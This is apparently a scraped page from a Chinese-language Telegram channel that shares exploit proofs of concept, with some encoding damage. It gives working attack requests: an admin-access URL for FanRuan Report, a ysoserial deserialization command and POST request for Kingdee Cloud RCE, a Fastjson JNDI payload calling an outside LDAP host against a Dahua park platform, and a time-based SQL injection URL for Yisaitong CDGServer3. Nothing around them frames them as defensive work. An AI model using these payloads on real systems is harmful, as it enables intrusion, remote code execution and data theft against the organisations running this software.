๐Ÿ”ฐ้ป‘็›’-๐‘ฉ๐’๐’‚๐’„๐’Œ ๐‘ฉ๐‘ถ๐‘ฟ-่ต„ๆบๅ…ฌๅผ€๐Ÿ…ฅ๏ผˆๆ•ฐๆฎ็œ‹ๆ–‡ไปถ๏ผ‰
46.3K subscribers
46 photos
8 videos
356 files
73 links
Download Telegram
ๅธ†่ฝฏๆŠฅ่กจ็ณป็ปŸ่Žทๅ–็ฎก็†ๅ‘˜ๆƒ้™
/ReportServer?op=fr_auth&cmd=ah_loginui&_=1619832545582
้‡‘่ถไบ‘RCEๆผๆดž poc

ๅฝฑๅ“ๅนณๅฐ
6.x --> 6.2.1012.4
7.x --> 7.0.352.16ใ€7.7.0.202111
8.x --> 8.0.0.202205ใ€8.1.0.20221110
็”Ÿๆˆๅๅบๅˆ—ๅŒ–payload๏ผš
ysoserial.exe -f BinaryFormatter -g ResourceSet -o base64 -c "ping 8d51yv.dnslog.cn"

POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1
Host: 192.168.0.110
User-Agent: Go-http-client/1.1
Content-Length: 2687
Content-Type: text/json
Accept-Encoding: gzip

{"ap0":"payload ๆ•ฐๅ€ผ","format":"3"}
๐Ÿ‘5โค1
(CVE-2023-2317) ๅŸบไบŽ Typora DOM ็š„่ทจ็ซ™็‚น่„šๆœฌๅฏผ่‡ด่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒ
Typora ๆ˜ฏไธ€ๆฌพๆต่กŒ็š„่ทจๅนณๅฐ Markdown ็ผ–่พ‘ๅ™จ๏ผŒๅ…่ฎธ็”จๆˆทๅˆ›ๅปบๅ’Œ็ผ–่พ‘ๅ…ทๆœ‰ๅฎžๆ—ถ้ข„่งˆๅŠŸ่ƒฝ็š„ Markdown ๆ–‡ไปถ
https://starlabs.sg/advisories/23/23-2317/
๐Ÿ‘5โค2
ๅคงๅŽๆ™บๆ…งๅ›ญๅŒบ็ปผๅˆ็ฎก็†ๅนณๅฐ ipms ่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒๆผๆดž POC
POST /ipms/barpay/pay HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cmd: id
Content-Type: application/json
Accept-Encoding: gzip
Content-Length: 104
{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://xxxxx/Basic/TomcatEcho", "autoCommit": true}
โค1
ไบฟๅกž้€š update.jsp sql ๆณจๅ…ฅๆผๆดž POC
GET http://1ip:port/CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20D ELAY%20%270:0:2%27--
๐Ÿ‘1
่ฟท่Œซๅคงๅญฆ็”ŸvsไปŠๆ—ฅ็™พไธ‡้ป‘ไบงๅคดๅญ
๐Ÿ‘28๐Ÿคก2โค1